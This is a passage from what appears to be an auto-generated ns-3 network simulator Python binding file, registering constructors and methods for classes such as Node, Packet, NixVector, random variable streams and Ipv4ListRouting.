numTxQueues) [member function] cls.add_method('SetTxQueuesN', 'void', [param('uint8_t', 'numTxQueues')]) ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3NixVector_methods(root_module, cls): cls.add_output_stream_operator() ## nix-vector.h (module 'network'): ns3::NixVector::NixVector() [constructor] cls.add_constructor([]) ## nix-vector.h (module 'network'): ns3::NixVector::NixVector(ns3::NixVector const & o) [copy constructor] cls.add_constructor([param('ns3::NixVector const &', 'o')]) ## nix-vector.h (module 'network'): void ns3::NixVector::AddNeighborIndex(uint32_t newBits, uint32_t numberOfBits) [member function] cls.add_method('AddNeighborIndex', 'void', [param('uint32_t', 'newBits'), param('uint32_t', 'numberOfBits')]) ## nix-vector.h (module 'network'): uint32_t ns3::NixVector::BitCount(uint32_t numberOfNeighbors) const [member function] cls.add_method('BitCount', 'uint32_t', [param('uint32_t', 'numberOfNeighbors')], is_const=True) ## nix-vector.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::NixVector::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::NixVector >', [], is_const=True) ## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Deserialize(uint32_t const * buffer, uint32_t size) [member function] cls.add_method('Deserialize', 'uint32_t', [param('uint32_t const *', 'buffer'), param('uint32_t', 'size')]) ## nix-vector.h (module 'network'): uint32_t ns3::NixVector::ExtractNeighborIndex(uint32_t numberOfBits) [member function] cls.add_method('ExtractNeighborIndex', 'uint32_t', [param('uint32_t', 'numberOfBits')]) ## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetRemainingBits() [member function] cls.add_method('GetRemainingBits', 'uint32_t', []) ## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True) ## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Serialize(uint32_t * buffer, uint32_t maxSize) const [member function] cls.add_method('Serialize', 'uint32_t', [param('uint32_t *', 'buffer'), param('uint32_t', 'maxSize')], is_const=True) return def register_Ns3Node_methods(root_module, cls): ## node.h (module 'network'): ns3::Node::Node(ns3::Node const & arg0) [copy constructor] cls.add_constructor([param('ns3::Node const &', 'arg0')]) ## node.h (module 'network'): ns3::Node::Node() [constructor] cls.add_constructor([]) ## node.h (module 'network'): ns3::Node::Node(uint32_t systemId) [constructor] cls.add_constructor([param('uint32_t', 'systemId')]) ## node.h (module 'network'): uint32_t ns3::Node::AddApplication(ns3::Ptr<ns3::Application> application) [member function] cls.add_method('AddApplication', 'uint32_t', [param('ns3::Ptr< ns3::Application >', 'application')]) ## node.h (module 'network'): uint32_t ns3::Node::AddDevice(ns3::Ptr<ns3::NetDevice> device) [member function] cls.add_method('AddDevice', 'uint32_t', [param('ns3::Ptr< ns3::NetDevice >', 'device')]) ## node.h (module 'network'): static bool ns3::Node::ChecksumEnabled() [member function] cls.add_method('ChecksumEnabled', 'bool', [], is_static=True) ## node.h (module 'network'): ns3::Ptr<ns3::Application> ns3::Node::GetApplication(uint32_t index) const [member function] cls.add_method('GetApplication', 'ns3::Ptr< ns3::Application >', [param('uint32_t', 'index')], is_const=True) ## node.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Node::GetDevice(uint32_t index) const [member function] cls.add_method('GetDevice', 'ns3::Ptr< ns3::NetDevice >', [param('uint32_t', 'index')], is_const=True) ## node.h (module 'network'): uint32_t ns3::Node::GetId() const [member function] cls.add_method('GetId', 'uint32_t', [], is_const=True) ## node.h (module 'network'): ns3::Time ns3::Node::GetLocalTime() const [member function] cls.add_method('GetLocalTime', 'ns3::Time', [], is_const=True) ## node.h (module 'network'): uint32_t ns3::Node::GetNApplications() const [member function] cls.add_method('GetNApplications', 'uint32_t', [], is_const=True) ## node.h (module 'network'): uint32_t ns3::Node::GetNDevices() const [member function] cls.add_method('GetNDevices', 'uint32_t', [], is_const=True) ## node.h (module 'network'): uint32_t ns3::Node::GetSystemId() const [member function] cls.add_method('GetSystemId', 'uint32_t', [], is_const=True) ## node.h (module 'network'): static ns3::TypeId ns3::Node::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## node.h (module 'network'): void ns3::Node::RegisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function] cls.add_method('RegisterDeviceAdditionListener', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')]) ## node.h (module 'network'): void ns3::Node::RegisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler, uint16_t protocolType, ns3::Ptr<ns3::NetDevice> device, bool promiscuous=false) [member function] cls.add_method('RegisterProtocolHandler', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler'), param('uint16_t', 'protocolType'), param('ns3::Ptr< ns3::NetDevice >', 'device'), param('bool', 'promiscuous', default_value='false')]) ## node.h (module 'network'): void ns3::Node::UnregisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function] cls.add_method('UnregisterDeviceAdditionListener', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')]) ## node.h (module 'network'): void ns3::Node::UnregisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler) [member function] cls.add_method('UnregisterProtocolHandler', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler')]) ## node.h (module 'network'): void ns3::Node::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True) ## node.h (module 'network'): void ns3::Node::DoInitialize() [member function] cls.add_method('DoInitialize', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3NormalRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable::INFINITE_VALUE [variable] cls.add_static_attribute('INFINITE_VALUE', 'double const', is_const=True) ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::NormalRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable::NormalRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetMean() const [member function] cls.add_method('GetMean', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetVariance() const [member function] cls.add_method('GetVariance', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetBound() const [member function] cls.add_method('GetBound', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetValue(double mean, double variance, double bound=ns3::NormalRandomVariable::INFINITE_VALUE) [member function] cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'variance'), param('double', 'bound', default_value='ns3::NormalRandomVariable::INFINITE_VALUE')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::NormalRandomVariable::GetInteger(uint32_t mean, uint32_t variance, uint32_t bound) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'variance'), param('uint32_t', 'bound')]) ## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::NormalRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3ObjectFactoryChecker_methods(root_module, cls): ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker() [constructor] cls.add_constructor([]) ## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker(ns3::ObjectFactoryChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectFactoryChecker const &', 'arg0')]) return def register_Ns3ObjectFactoryValue_methods(root_module, cls): ## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue() [constructor] cls.add_constructor([]) ## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactoryValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::ObjectFactoryValue const &', 'arg0')]) ## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactory const & value) [constructor] cls.add_constructor([param('ns3::ObjectFactory const &', 'value')]) ## object-factory.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::ObjectFactoryValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## object-factory.h (module 'core'): bool ns3::ObjectFactoryValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## object-factory.h (module 'core'): ns3::ObjectFactory ns3::ObjectFactoryValue::Get() const [member function] cls.add_method('Get', 'ns3::ObjectFactory', [], is_const=True) ## object-factory.h (module 'core'): std::string ns3::ObjectFactoryValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## object-factory.h (module 'core'): void ns3::ObjectFactoryValue::Set(ns3::ObjectFactory const & value) [member function] cls.add_method('Set', 'void', [param('ns3::ObjectFactory const &', 'value')]) return def register_Ns3OutputStreamWrapper_methods(root_module, cls): ## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(ns3::OutputStreamWrapper const & arg0) [copy constructor] cls.add_constructor([param('ns3::OutputStreamWrapper const &', 'arg0')]) ## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(std::string filename, std::_Ios_Openmode filemode) [constructor] cls.add_constructor([param('std::string', 'filename'), param('std::_Ios_Openmode', 'filemode')]) ## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(std::ostream * os) [constructor] cls.add_constructor([param('std::ostream *', 'os')]) ## output-stream-wrapper.h (module 'network'): std::ostream * ns3::OutputStreamWrapper::GetStream() [member function] cls.add_method('GetStream', 'std::ostream *', []) return def register_Ns3Packet_methods(root_module, cls): cls.add_output_stream_operator() ## packet.h (module 'network'): ns3::Packet::Packet() [constructor] cls.add_constructor([]) ## packet.h (module 'network'): ns3::Packet::Packet(ns3::Packet const & o) [copy constructor] cls.add_constructor([param('ns3::Packet const &', 'o')]) ## packet.h (module 'network'): ns3::Packet::Packet(uint32_t size) [constructor] cls.add_constructor([param('uint32_t', 'size')]) ## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size, bool magic) [constructor] cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size'), param('bool', 'magic')]) ## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size) [constructor] cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size')]) ## packet.h (module 'network'): void ns3::Packet::AddAtEnd(ns3::Ptr<const ns3::Packet> packet) [member function] cls.add_method('AddAtEnd', 'void', [param('ns3::Ptr< ns3::Packet const >', 'packet')]) ## packet.h (module 'network'): void ns3::Packet::AddByteTag(ns3::Tag const & tag) const [member function] cls.add_method('AddByteTag', 'void', [param('ns3::Tag const &', 'tag')], is_const=True) ## packet.h (module 'network'): void ns3::Packet::AddHeader(ns3::Header const & header) [member function] cls.add_method('AddHeader', 'void', [param('ns3::Header const &', 'header')]) ## packet.h (module 'network'): void ns3::Packet::AddPacketTag(ns3::Tag const & tag) const [member function] cls.add_method('AddPacketTag', 'void', [param('ns3::Tag const &', 'tag')], is_const=True) ## packet.h (module 'network'): void ns3::Packet::AddPaddingAtEnd(uint32_t size) [member function] cls.add_method('AddPaddingAtEnd', 'void', [param('uint32_t', 'size')]) ## packet.h (module 'network'): void ns3::Packet::AddTrailer(ns3::Trailer const & trailer) [member function] cls.add_method('AddTrailer', 'void', [param('ns3::Trailer const &', 'trailer')]) ## packet.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::Packet::BeginItem() const [member function] cls.add_method('BeginItem', 'ns3::PacketMetadata::ItemIterator', [], is_const=True) ## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::Packet >', [], is_const=True) ## packet.h (module 'network'): uint32_t ns3::Packet::CopyData(uint8_t * buffer, uint32_t size) const [member function] cls.add_method('CopyData', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint32_t', 'size')], is_const=True) ## packet.h (module 'network'): void ns3::Packet::CopyData(std::ostream * os, uint32_t size) const [member function] cls.add_method('CopyData', 'void', [param('std::ostream *', 'os'), param('uint32_t', 'size')], is_const=True) ## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::CreateFragment(uint32_t start, uint32_t length) const [member function] cls.add_method('CreateFragment', 'ns3::Ptr< ns3::Packet >', [param('uint32_t', 'start'), param('uint32_t', 'length')], is_const=True) ## packet.h (module 'network'): static void ns3::Packet::EnableChecking() [member function] cls.add_method('EnableChecking', 'void', [], is_static=True) ## packet.h (module 'network'): static void ns3::Packet::EnablePrinting() [member function] cls.add_method('EnablePrinting', 'void', [], is_static=True) ## packet.h (module 'network'): bool ns3::Packet::FindFirstMatchingByteTag(ns3::Tag & tag) const [member function] cls.add_method('FindFirstMatchingByteTag', 'bool', [param('ns3::Tag &', 'tag')], is_const=True) ## packet.h (module 'network'): ns3::ByteTagIterator ns3::Packet::GetByteTagIterator() const [member function] cls.add_method('GetByteTagIterator', 'ns3::ByteTagIterator', [], is_const=True) ## packet.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::Packet::GetNixVector() const [member function] cls.add_method('GetNixVector', 'ns3::Ptr< ns3::NixVector >', [], is_const=True) ## packet.h (module 'network'): ns3::PacketTagIterator ns3::Packet::GetPacketTagIterator() const [member function] cls.add_method('GetPacketTagIterator', 'ns3::PacketTagIterator', [], is_const=True) ## packet.h (module 'network'): uint32_t ns3::Packet::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True) ## packet.h (module 'network'): uint32_t ns3::Packet::GetSize() const [member function] cls.add_method('GetSize', 'uint32_t', [], is_const=True) ## packet.h (module 'network'): uint64_t ns3::Packet::GetUid() const [member function] cls.add_method('GetUid', 'uint64_t', [], is_const=True) ## packet.h (module 'network'): uint32_t ns3::Packet::PeekHeader(ns3::Header & header) const [member function] cls.add_method('PeekHeader', 'uint32_t', [param('ns3::Header &', 'header')], is_const=True) ## packet.h (module 'network'): bool ns3::Packet::PeekPacketTag(ns3::Tag & tag) const [member function] cls.add_method('PeekPacketTag', 'bool', [param('ns3::Tag &', 'tag')], is_const=True) ## packet.h (module 'network'): uint32_t ns3::Packet::PeekTrailer(ns3::Trailer & trailer) [member function] cls.add_method('PeekTrailer', 'uint32_t', [param('ns3::Trailer &', 'trailer')]) ## packet.h (module 'network'): void ns3::Packet::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True) ## packet.h (module 'network'): void ns3::Packet::PrintByteTags(std::ostream & os) const [member function] cls.add_method('PrintByteTags', 'void', [param('std::ostream &', 'os')], is_const=True) ## packet.h (module 'network'): void ns3::Packet::PrintPacketTags(std::ostream & os) const [member function] cls.add_method('PrintPacketTags', 'void', [param('std::ostream &', 'os')], is_const=True) ## packet.h (module 'network'): void ns3::Packet::RemoveAllByteTags() [member function] cls.add_method('RemoveAllByteTags', 'void', []) ## packet.h (module 'network'): void ns3::Packet::RemoveAllPacketTags() [member function] cls.add_method('RemoveAllPacketTags', 'void', []) ## packet.h (module 'network'): void ns3::Packet::RemoveAtEnd(uint32_t size) [member function] cls.add_method('RemoveAtEnd', 'void', [param('uint32_t', 'size')]) ## packet.h (module 'network'): void ns3::Packet::RemoveAtStart(uint32_t size) [member function] cls.add_method('RemoveAtStart', 'void', [param('uint32_t', 'size')]) ## packet.h (module 'network'): uint32_t ns3::Packet::RemoveHeader(ns3::Header & header) [member function] cls.add_method('RemoveHeader', 'uint32_t', [param('ns3::Header &', 'header')]) ## packet.h (module 'network'): bool ns3::Packet::RemovePacketTag(ns3::Tag & tag) [member function] cls.add_method('RemovePacketTag', 'bool', [param('ns3::Tag &', 'tag')]) ## packet.h (module 'network'): uint32_t ns3::Packet::RemoveTrailer(ns3::Trailer & trailer) [member function] cls.add_method('RemoveTrailer', 'uint32_t', [param('ns3::Trailer &', 'trailer')]) ## packet.h (module 'network'): bool ns3::Packet::ReplacePacketTag(ns3::Tag & tag) [member function] cls.add_method('ReplacePacketTag', 'bool', [param('ns3::Tag &', 'tag')]) ## packet.h (module 'network'): uint32_t ns3::Packet::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function] cls.add_method('Serialize', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')], is_const=True) ## packet.h (module 'network'): void ns3::Packet::SetNixVector(ns3::Ptr<ns3::NixVector> nixVector) [member function] cls.add_method('SetNixVector', 'void', [param('ns3::Ptr< ns3::NixVector >', 'nixVector')]) ## packet.h (module 'network'): std::string ns3::Packet::ToString() const [member function] cls.add_method('ToString', 'std::string', [], is_const=True) return def register_Ns3ParetoRandomVariable_methods(root_module, cls): ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ParetoRandomVariable::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## random-variable-stream.h (module 'core'): ns3::ParetoRandomVariable::ParetoRandomVariable() [constructor] cls.add_constructor([]) ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetMean() const [member function] cls.add_method('GetMean', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetShape() const [member function] cls.add_method('GetShape', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetBound() const [member function] cls.add_method('GetBound', 'double', [], is_const=True) ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetValue(double mean, double shape, double bound) [member function] cls.add_method('GetValue', 'double', [param('double', 'mean'), param('double', 'shape'), param('double', 'bound')]) ## random-variable-stream.h (module 'core'): uint32_t ns3::ParetoRandomVariable::GetInteger(uint32_t mean, uint32_t shape, uint32_t bound) [member function] cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mean'), param('uint32_t', 'shape'), param('uint32_t', 'bound')]) ## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetValue() [member function] cls.add_method('GetValue', 'double', [], is_virtual=True) ## random-variable-stream.h (module 'core'): uint32_t ns3::ParetoRandomVariable::GetInteger() [member function] cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True) return def register_Ns3QueueItem_methods(root_module, cls): cls.add_output_stream_operator() ## net-device.h (module 'network'): ns3::QueueItem::QueueItem(ns3::Ptr<ns3::Packet> p) [constructor] cls.add_constructor([param('ns3::Ptr< ns3::Packet >', 'p')]) ## net-device.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::QueueItem::GetPacket() const [member function] cls.add_method('GetPacket', 'ns3::Ptr< ns3::Packet >', [], is_const=True) ## net-device.h (module 'network'): uint32_t ns3::QueueItem::GetPacketSize() const [member function] cls.add_method('GetPacketSize', 'uint32_t', [], is_const=True, is_virtual=True) ## net-device.h (module 'network'): bool ns3::QueueItem::GetUint8Value(ns3::QueueItem::Uint8Values field, uint8_t & value) const [member function] cls.add_method('GetUint8Value', 'bool', [param('ns3::QueueItem::Uint8Values', 'field'), param('uint8_t &', 'value')], is_const=True, is_virtual=True) ## net-device.h (module 'network'): void ns3::QueueItem::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True) return def register_Ns3TimeValue_methods(root_module, cls): ## nstime.h (module 'core'): ns3::TimeValue::TimeValue() [constructor] cls.add_constructor([]) ## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::TimeValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::TimeValue const &', 'arg0')]) ## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::Time const & value) [constructor] cls.add_constructor([param('ns3::Time const &', 'value')]) ## nstime.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TimeValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## nstime.h (module 'core'): bool ns3::TimeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## nstime.h (module 'core'): ns3::Time ns3::TimeValue::Get() const [member function] cls.add_method('Get', 'ns3::Time', [], is_const=True) ## nstime.h (module 'core'): std::string ns3::TimeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## nstime.h (module 'core'): void ns3::TimeValue::Set(ns3::Time const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Time const &', 'value')]) return def register_Ns3TypeIdChecker_methods(root_module, cls): ## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')]) return def register_Ns3TypeIdValue_methods(root_module, cls): ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')]) ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor] cls.add_constructor([param('ns3::TypeId const &', 'value')]) ## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function] cls.add_method('Get', 'ns3::TypeId', [], is_const=True) ## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function] cls.add_method('Set', 'void', [param('ns3::TypeId const &', 'value')]) return def register_Ns3AddressChecker_methods(root_module, cls): ## address.h (module 'network'): ns3::AddressChecker::AddressChecker() [constructor] cls.add_constructor([]) ## address.h (module 'network'): ns3::AddressChecker::AddressChecker(ns3::AddressChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::AddressChecker const &', 'arg0')]) return def register_Ns3AddressValue_methods(root_module, cls): ## address.h (module 'network'): ns3::AddressValue::AddressValue() [constructor] cls.add_constructor([]) ## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::AddressValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::AddressValue const &', 'arg0')]) ## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::Address const & value) [constructor] cls.add_constructor([param('ns3::Address const &', 'value')]) ## address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::AddressValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## address.h (module 'network'): bool ns3::AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## address.h (module 'network'): ns3::Address ns3::AddressValue::Get() const [member function] cls.add_method('Get', 'ns3::Address', [], is_const=True) ## address.h (module 'network'): std::string ns3::AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## address.h (module 'network'): void ns3::AddressValue::Set(ns3::Address const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Address const &', 'value')]) return def register_Ns3Ipv4ListRouting_methods(root_module, cls): ## ipv4-list-routing.h (module 'internet'): ns3::Ipv4ListRouting::Ipv4ListRouting(ns3::Ipv4ListRouting const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv4ListRouting const &', 'arg0')]) ## ipv4-list-routing.h (module 'internet'): ns3::Ipv4ListRouting::Ipv4ListRouting() [constructor] cls.add_constructor([]) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::AddRoutingProtocol(ns3::Ptr<ns3::Ipv4RoutingProtocol> routingProtocol, int16_t priority) [member function] cls.add_method('AddRoutingProtocol', 'void', [param('ns3::Ptr< ns3::Ipv4RoutingProtocol >', 'routingProtocol'), param('int16_t', 'priority')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): uint32_t ns3::Ipv4ListRouting::GetNRoutingProtocols() const [member function] cls.add_method('GetNRoutingProtocols', 'uint32_t', [], is_const=True, is_virtual=True) ## ipv4-list-routing.h (module 'internet'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::Ipv4ListRouting::GetRoutingProtocol(uint32_t index, int16_t & priority) const [member function] cls.add_method('GetRoutingProtocol', 'ns3::Ptr< ns3::Ipv4RoutingProtocol >', [param('uint32_t', 'index'), param('int16_t &', 'priority', direction=2)], is_const=True, is_virtual=True) ## ipv4-list-routing.h (module 'internet'): static ns3::TypeId ns3::Ipv4ListRouting::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::NotifyAddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('NotifyAddAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::NotifyInterfaceDown(uint32_t interface) [member function] cls.add_method('NotifyInterfaceDown', 'void', [param('uint32_t', 'interface')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::NotifyInterfaceUp(uint32_t interface) [member function] cls.add_method('NotifyInterfaceUp', 'void', [param('uint32_t', 'interface')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::NotifyRemoveAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function] cls.add_method('NotifyRemoveAddress', 'void', [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')], is_virtual=True) ## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::PrintRoutingTable(ns3::Ptr<ns3::OutputStreamWrapper> stream, ns3::Time::Unit unit=::ns3::Time::S) const [member function] cls.add_method('PrintRoutingTable', 'void', [param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream'), param('ns3::Time::Unit', 'unit', default_value='::ns3::Time::S')], is_const=True, is_virtual=True) ## ipv4-list-routing.h (module 'internet'): bool ns3::Ipv4ListRouting::RouteInput(ns3::Ptr<const ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<const ns3::NetDevice> idev, ns3::Callback<void,ns3::Ptr<ns3::Ipv4Route>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ucb, ns3::Callback<void,ns3::Ptr<ns3::Ipv4MulticastRoute>,ns3::Ptr<const ns3::Packet>,const 